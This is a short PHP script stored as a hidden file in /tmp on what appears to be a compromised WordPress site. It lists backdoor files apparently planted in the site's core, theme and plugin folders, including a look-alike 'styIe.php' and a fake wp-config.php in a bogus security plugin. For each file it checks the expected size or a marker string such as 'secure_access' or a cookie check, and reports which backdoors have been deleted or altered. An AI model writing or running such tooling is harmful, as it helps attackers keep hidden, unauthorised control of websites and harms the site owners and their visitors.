File: //tmp/.locked
<?php $r = '/home/jakethepen/jakethepen.com'; $x = ["/index.php"=>"bd@@48687@@If-Modified-Since",
"/wp-includes/html-api/front.page.template.1748027118.php"=>"bd@@264489@@727",
"/wp-content/themes/custom-file-2-1748020391/styIe.php"=>"bd@@257846@@727",
"/wp-includes/block-patterns.php"=>"bd@@207706@@secure_access",
"/wp-content/plugins/security-1748014870/wp-config.php"=>"bd@@253096@@727",
"/wp-content/plugins/wpforms-lite/vendor/woocommerce/action-scheduler/classes/schema/ActionScheduler_StoreSchema.php"=>"bd@@357572@@93",
"/wp-content/plugins/woocommerce/patterns/page-coming-soon-image-gallery.php"=>"bd@@207337@@$_COOKIE[-"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');